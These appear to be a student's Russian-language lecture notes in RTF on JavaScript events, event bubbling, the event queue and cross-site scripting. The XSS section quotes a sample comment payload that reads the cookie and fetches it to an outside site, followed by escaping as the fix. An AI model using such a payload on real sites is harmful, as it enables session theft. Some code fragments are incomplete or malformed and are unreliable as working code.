{\rtf1\ansi\ansicpg1251\deff0\nouicompat{\fonttbl{\f0\fnil\fcharset204 Calibri;}{\f1\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 10.0.17134}\viewkind4\uc1 
\pard\sa200\sl276\slmult1\qr\f0\fs22\lang1049 13\f1\lang1033 .0\f0\lang1049 5\f1\lang1033 .2019\par

\pard\sa200\sl276\slmult1\qc\f0\lang1049\par

\pard\sa200\sl276\slmult1\f1\lang1033\par
fetch (  ,\{\par
\tab .then\par
\tab .then (text =>) \{\par
\tab\tab if (text = "\f0\lang1049\'d3\'f1\'ef\'e5\'f5\f1\lang1033 "\f0\lang1049 )\f1\lang1033  \{\par
\tab\tab\tab window.location.href = "/login"\par
\tab\tab\}\par
\tab\}\par
\});\par
\par

\pard\sa200\sl276\slmult1\qc\b EVENTS\par

\pard\sa200\sl276\slmult1\b0\f0\lang1049\'c5\'f1\'eb\'e8 \'f1\'ee\'e7\'e4\'e0\'f2\'fc \'f4\'ee\'f0\'ec\'f3 \'ed\'e0 \f1\lang1033 HTML\f0\lang1049 , \'ef\'ee\'eb\'e5 \'eb\'ee\'e3\'e8\'ed, \'ef\'e0\'f0\'ee\'eb\'fc \'e8 \'ea\'ed\'ee\'ef\'ea\'f3, \'ef\'f0\'e8 \'ed\'e0\'e6\'e0\'f2\'e8\'e8 \'ed\'e0 \'ea\'ed\'ee\'ef\'ea\'f3 \'ed\'e8\'f7\'e5\'e3\'ee \'ed\'e5 \'ef\'f0\'ee\'e8\'e7\'ee\'e9\'e4\'e5\'f2 - \'f3 \'f1\'ee\'e1\'fb\'f2\'e8\'ff \'ea\'ed\'ee\'ef\'ea\'e8 \'ed\'e5\'f2 \'ee\'e1\'f0\'e0\'e1\'ee\'f2\'f7\'e8\'ea\'e0. \'d2\'ee \'e5\'f1\'f2\'fc \'ed\'e0 \'f1\'ee\'e1\'fb\'f2\'e8\'e5 \'ed\'f3\'e6\'ed\'ee \'ee\'e1\'ff\'e7\'e0\'f2\'e5\'eb\'fc\'ed\'ee "\'ef\'ee\'e2\'e5\'f1\'e8\'f2\'fc" \'ee\'e1\'f0\'e0\'e1\'ee\'f2\'f7\'e8\'ea, \'e2 \'f0\'e5\'e7\'f3\'eb\'fc\'f2\'e0\'f2\'e5 \'f3 \'ee\'e1\'f0\'e0\'e1\'ee\'f2\'f7\'e8\'ea\'e0 \'e1\'f3\'e4\'e5\'f2 \'f1\'ee\'f1\'f2\'ee\'ff\'ed\'e8\'e5 (\f1\lang1033 event)\f0\lang1049 , \'f3\'ea\'e0\'e7\'fb\'e2\'e0\'fe\'f9\'e5\'e5 \'ed\'e0 \'ef\'e0\'f0\'e0\'ec\'e5\'f2\'f0\'fb: \'ea\'ee\'ee\'f0\'e4\'e8\'ed\'e0\'f2\'fb \'ec\'fb\'f8\'e8, \'f2\'e8\'ef \'ed\'e0\'e6\'e0\'f2\'e8\'ff \'e8 \'f2.\'e4.\par
\'f1\'ee\'e1\'fb\'f2\'e8\'ff: \par
\f1\lang1033\tab keydown\par
\tab keyup\par
\tab keypress\f0\lang1049\par
\f1\lang1033\tab dragstart\par
\tab drop\par
\f0\lang1049\'e8 \'f2.\'e4.\par
\'c4\'e2\'e0 \'ec\'ee\'ec\'e5\'ed\'f2\'e0:\par
1. \'c4\'e5\'e9\'f1\'f2\'e2\'e8\'ff \'ef\'ee \'f3\'ec\'ee\'eb\'f7\'e0\'ed\'e8\'fe: \f1\lang1033 click \f0\lang1049\'ed\'e0 \'ea\'ed\'ee\'ef\'ea\'e5 \'f2\'e8\'ef\'e0 \f1\lang1033 submit\par
\f0\lang1049 2. \f1\lang1033 event.cancelBubble = true/false\f0\lang1049  - \'ee\'f2\'ec\'e5\'ed\'e0 \'e2\'f1\'ef\'eb\'fb\'f2\'e8\'ff\par
\f1\lang1033 <body>\par
\tab <div>\par
\tab\tab <form>\par
\tab\tab\tab <input>\f0\lang1049\par
\f1\lang1033\tab\tab\tab <input type = "submit">\par
...\par
\f0\lang1049\'c2\'eb\'ee\'e6\'e5\'ed\'ed\'ee\'f1\'f2\'fc \'ec\'ee\'e6\'ed\'ee \'ef\'f0\'e5\'e4\'f1\'f2\'e0\'e2\'e8\'f2\'fc \'f2\'e0\'ea:\par
\f1\lang1033 body\tab ______________________________________________\f0\lang1049\par
\f1\lang1033 div\tab\tab _________________________________\par
form\tab\tab\tab __________________\par
Input\tab\tab\tab\tab _____\par
\f0\lang1049\'d1\'ed\'e0\'f7\'e0\'eb\'e0 \'f1\'f0\'e0\'e1\'ee\'f2\'e0\'e5\'f2 \'ea\'eb\'e8\'ea \'ed\'e0 \'e8\'ed\'ef\'f3\'f2\'e5, \'ef\'f0\'ee\'e8\'e7\'ee\'e9\'e4\'e5\'f2 \'ee\'e1\'f0\'e0\'e1\'ee\'f2\'ea\'e0,  \'e7\'e0\'f2\'e5\'ec \'e8\'e4\'e5\'ec \'ed\'e0 \'e2\'e5\'f0\'f5\'ed\'e8\'e5 \'f3\'f0\'ee\'e2\'ed\'e8 - \'e8\'ed\'ef\'f3\'f2 - \'fd\'f2\'ee \'f7\'e0\'f1\'f2\'fc \'e1\'ee\'e4\'e8, \'e8\'ed\'ef\'f3\'f2 \'f1\'f0\'e0\'e1\'ee\'f2\'e0\'e5\'f2 \'ed\'e0 \'e2\'f1\'e5\'e9 \'f6\'e5\'ef\'ee\'f7\'ea\'e5, \'ea\'e0\'ea\'e0\'ff \'e1\'fb \'e2\'eb\'ee\'e6\'e5\'ed\'ed\'ee\'f1\'f2\'fc \'ed\'e5 \'e1\'fb\'eb\'e0, \'ef\'f0\'ee\'e1\'e5\'e6\'e8\'f2\'f1\'ff \'ef\'ee \'e2\'f1\'e5\'ec \'fd\'eb\'e5\'ec\'e5\'ed\'f2\'e0\'ec, \'ef\'f0\'ee\'e2\'e5\'f0\'e8\'f2 \'f0\'e5\'e3\'e8\'f1\'f2\'f0\'e0\'f6\'e8\'fe \'f1\'ee\'e1\'fb\'f2\'e8\'e9 (\f1\lang1033 eventlistener)\f0\lang1049  \'ed\'e0 \'e2\'f1\'e5\'f5 \'ee\'e1\'fa\'e5\'ea\'f2\'e0\'f5 \'e2\'fb\'f8\'e5 (\'f2\'ee \'e5\'f1\'f2\'fc "\'e2\'f1\'ef\'eb\'fb\'e2\'e5\'f2"), \'cd\'ce:\par
\'e5\'f1\'eb\'e8 \'e2 \'ee\'e1\'f0\'e0\'e1\'ee\'f2\'f7\'e8\'ea\'e5 \'f1\'ee\'e1\'fb\'f2\'e8\'ff \'ea\'ed\'ee\'ef\'ea\'e8 (\f1\lang1033 input)\f0\lang1049  \'ef\'ee\'f1\'f2\'e0\'e2\'e8\'f2\'fc \f1\lang1033 event.cancelBubble \f0\lang1049  = \f1\lang1033 true;\f0\lang1049  \'f2\'ee \'e2\'f1\'ef\'e4\'fb\'f2\'e8\'ff \'ed\'e5 \'ef\'f0\'ee\'e8\'e7\'ee\'e9\'e4\'e5\'f2.\f1\lang1033\par
\par
Javascript \f0\lang1049\'e2 \'e1\'f0\'e0\'f3\'e7\'e5\'f0\'e5 \'e2\'fb\'ef\'ee\'eb\'ed\'ff\'e5\'f2\'f1\'ff \'e2 \'ee\'e4\'ed\'ee\'ec \'ef\'ee\'f2\'ee\'ea\'e5. \'c2\'f1\'e5 \'eb\'e8\'ed\'e5\'e9\'ed\'ee \'e8 \'ef\'ee\'f1\'eb\'e5\'e4\'ee\'e2\'e0\'f2\'e5\'eb\'fc\'ed\'ee.\par
\'ca\'e0\'ea \'f2\'ee\'e3\'e4\'e0 \'ee\'e1\'f0\'e0\'e1\'e0\'f2\'fb\'e2\'e0\'f2\'fc \'f1\'ee\'e1\'e8\'fb\'f2\'e8\'ff, \'ea\'e0\'ea \'f3\'f1\'ef\'e5\'e2\'e0\'f2\'fc \'e8\'f5 \'ee\'e1\'f0\'e0\'e1\'e0\'f2\'fb\'e2\'e0\'f2\'fc?\par
\'d2\'e0\'ea \'e2\'ee\'f2 - \'e5\'f1\'f2\'fc \'ee\'f7\'e5\'f0\'e5\'e4\'fc \'f1\'ee\'e1\'fb\'f2\'e8\'e9.\par
\f1\lang1033 setTimeout(function()\{\}, 2000); - \f0\lang1049\'f7\'e5\'f0\'e5\'e7 \'ea\'e0\'ea\'ee\'e9 \'e8\'ed\'f2\'e5\'f0\'e2\'e0\'eb \'f1\'f0\'e0\'e1\'ee\'f2\'e0\'f2\'fc (\'e2 \'ec\'f1)\par
\'c8\'e4\'e5\'f2 \'ee\'e1\'f0\'e0\'e1\'ee\'f2\'ea\'e0 \'f1\'ee\'e1\'fb\'f2\'e8\'e9, \'e5\'f1\'eb\'e8 \'e4\'ee\'f5\'ee\'e4\'e8\'f2 \'f7\'e5\'f0\'e5\'e4 \'e4\'ee \'fd\'f2\'ee\'e3\'ee \'f1\'ee\'e1\'fb\'f2\'e8\'ff, \'e0 2000 \'ec\'f1 \'ed\'e5 \'ef\'f0\'ee\'f8\'eb\'e8, \'f2\'ee \'f1\'ee\'e1\'fb\'f2\'e8\'e5 \'ef\'e5\'f0\'e5\'ec\'e5\'e7\'e0\'e5\'f2\'f1\'ff \'e2 \'ca\'ce\'cd\'c5\'d6 \'ee\'f7\'e5\'f0\'e5\'e4\'e8, \'e8... \'e2\'fb\'ef\'ee\'eb\'ed\'e8\'f2\'f1\'ff \'ed\'e5 \'f4\'e0\'ea\'f2, \'f7\'f2\'ee \'f0\'ee\'e2\'ed\'ee \'f7\'e5\'f0\'e5\'e7 2000 - \'e7\'e0\'e2\'e8\'f1\'e8\'f2 \'ee\'f2 \'e7\'e0\'e3\'f0\'f3\'e6\'e5\'ed\'ed\'ee\'f1\'f2\'e8 \'ee\'f7\'e5\'f0\'e5\'e4\'e8 \'f1\'ee\'e1\'fb\'f2\'e8\'e9, \'e5\'f1\'eb\'e8 \'ef\'e5\'f0\'e5\'e3\'f0\'f3\'e6\'e5\'ed\'fb - \'e2\'fb\'ef\'ee\'eb\'ed\'e8\'f2\'f1\'ff \'ef\'ee\'e7\'e4\'ed\'e5\'e5.\f1\lang1033\par
setTimeout(function()\{\}, 0); \f0\lang1049\'d2\'ee\'e6\'e5 \'ef\'ee\'ec\'e5\'f1\'f2\'e8\'f2 \'e2 \'ea\'ee\'ed\'e5\'f6 \'ee\'f7\'e5\'f0\'e5\'e4\'e8, \'e8 \'f1\'f0\'e0\'e7\'f3 \'ed\'e5 \'e2\'fb\'ef\'ee\'eb\'ed\'e8\'f2 - \'ec\'ee\'e3\'f3\'f2 \'e1\'fb\'f2\'fc \'e4\'f0\'f3\'e3\'e8\'e5 \'f1\'ee\'e1\'fb\'f2\'e8\'ff \'e2 \'ee\'f7\'e5\'f0\'e5\'e4\'e8, \'ea\'ee\'f2\'ee\'f0\'fb\'e5 \'e5\'f9\'e5 \'e2\'fb\'ef\'ee\'eb\'ed\'ff\'fe\'f2\'f1\'ff.\f1\lang1033\par

\pard\sa200\sl276\slmult1\qc\b XSS - crosssite sessing\par

\pard\sa200\sl276\slmult1\b0\f0\lang1049\'cf\'ee\'e4\'ec\'e5\'ed\'e0: \'e2\'ec\'e5\'f1\'f2\'ee \'e8\'ec\'e5\'ed\'e8 \'ef\'ee\'fc\'e7\'ee\'e2\'e0\'f2\'e5\'eb\'ff \'ed\'e0 \'f4\'ee\'f0\'ec\'e5 \'ed\'e0\'ef\'e8\'f1\'e0\'f2\'fc \par
\f1\lang1033 comment3<script> let cookie = getCookie(); fetch("Mysite.com/sper_cookie.php)"</script> -\f0\lang1049  \'e0 \'e5\'f1\'eb\'e8 \'e5\'f1\'f2\'fc \'ef\'ee\'eb\'e5 \'ea\'ee\'ec\'ec\'e5\'ed\'f2\'e0\'f0\'e8\'ff? \'ed\'e0\'ef\'f0\'e8\'ec\'e5\'f0 \'f4\'ee\'f0\'f3\'ec, \'ee\'f2\'e7\'fb\'e2\'fb - \'e2\'ef\'e8\'f1\'fb\'e2\'e0\'e5\'ec \'ea\'ee\'e4 \'e2 \'ea\'ee\'ec\'ec\'e5\'ed\'f2\'e0\'f0\'e8\'e9.\par
\'ca\'ee\'e4 \'f3\'f8\'e5\'eb \'e2 \'e1\'e0\'e7\'f3 \'e4\'e0\'ed\'ed\'fb\'f5.\par
\f1\lang1033 POST\par
user1\par
comment1\par
user2\par
comment2\par
user3\par
comment3\par
\f0\lang1049\'e7\'e0\'f5\'ee\'e4\'e8\'f2 \'ed\'e0 \'f1\'f2\'f0\'e0\'ed\'e8\'f6\'f3 \f1\lang1033 User4, \f0\lang1049\'c8 \'f3 \'ed\'e5\'e3\'ee \'e8 \'c2\'d1\'c5\'d5 \'cf\'ce\'d1\'cb\'c5\'c4\'d3\'de\'d9\'c8\'d5 - \'e2\'fb\'ef\'ee\'eb\'ed\'ff\'e5\'f2\'f1\'ff \'f1\'ea\'f0\'e8\'ef\'f2, \'ef\'ee\'eb\'f3\'f7\'e0\'e5\'f2\'f1\'ff \'ea\'f3\'ea\'e0, \'ef\'e5\'f0\'e5\'f5\'e2\'e0\'f2\'fb\'e2\'e0\'e5\'f2\'f1\'ff \'f1\'e5\'f1\'f1\'e8\'ff, \'e8 - \'e2\'f3\'e0\'eb\'ff, \'e7\'e0\'f5\'ee\'e4 \'ed\'e0 \'f1\'e0\'e9\'f2!!!\par
\'c8\'eb\'e8 - \'ef\'ee\'eb\'ee\'ec\'e0\'f2\'fc \f1\lang1033 html. \f0\lang1049\'ca\'eb\'e0\'e4\'e5\'f8\'fc \'e2 \'ea\'ee\'ec\'ec\'e5\'ed\'f2 \'ea\'f0\'e8\'e2\'ee\'e9 \f1\lang1033 HTML / CSS\f0\lang1049  \par
\f1\lang1033 REACT \f0\lang1049\'e7\'e0\'f9\'e8\'f9\'e5\'ed \'ee\'f2 \'f1\'ea\'f0\'e8\'ef\'f2\'ee\'e2\'fb\'f5 \'e0\'f2\'e0\'ea, \'f2\'e0\'ea \'ea\'e0\'ea \'e2\'fb\'e2\'e5\'f1\'f2\'e8 \'f7\'e8\'f1\'f2\'fb\'e9 \f1\lang1033 HTML\f0\lang1049  \'ed\'e0 \'f0\'e5\'e0\'ea\'f2\'e5 \'ec\'ee\'e6\'ed\'ee, \'f2\'ee\'eb\'fc\'ea\'ee \'ef\'f0\'e8\'ec\'e5\'ed\'e8\'e2 \'f1\'ef\'e5\'f6 \'f4\'f3\'ed\'ea\'f6\'e8\'fe, \'ef\'f0\'ee \'ea\'ee\'f2\'ee\'f0\'f3\'fe \'e7\'e0\'ff\'e2\'eb\'e5\'ed\'ee - \'f2\'e0\'ec \'ed\'e8\'f7\'e5\'e3\'ee \'ed\'e5 \'f4\'e8\'eb\'fc\'f2\'f0\'f3\'e5\'f2\'f1\'ff.\par
\'cc\'ee\'e6\'ed\'ee \'f4\'e8\'eb\'fc\'f2\'f0\'ee\'e2\'e0\'f2\'fc \'f1\'e0\'ec\'ee\'ec\'f3 - \'e7\'e0\'ec\'e5\'ed\'ff\'ff \'f2\'e5\'e3\'e8\f1\lang1033 :\par
\f0\lang1049  \f1\lang1033 < \f0\lang1049\'ed\'e0 \f1\lang1033 &lt;\par
> \f0\lang1049\'ed\'e0 \f1\lang1033 &gt;\f0\lang1049\par
\'ce\'f2\'ee\'e1\'f0\'e0\'e6\'e0\'f2\'fc\'f1\'ff \'e1\'f3\'e4\'e5\'f2 \'ea\'e0\'ea \f1\lang1033 <script>\f0\lang1049 , \'ed\'ee \'ea\'e0\'ea \'f1\'ea\'f0\'e8\'ef\'f2 \'e2\'fb\'ef\'ee\'eb\'ed\'ff\'f2\'f1\'ff \'ed\'e5 \'e1\'f3\'e4\'e5\'f2!\par
\par
\b\f1\lang1033\par

\pard\sa200\sl276\slmult1\qc PROMISES\par

\pard\sa200\sl276\slmult1\par
\b0\par
}
 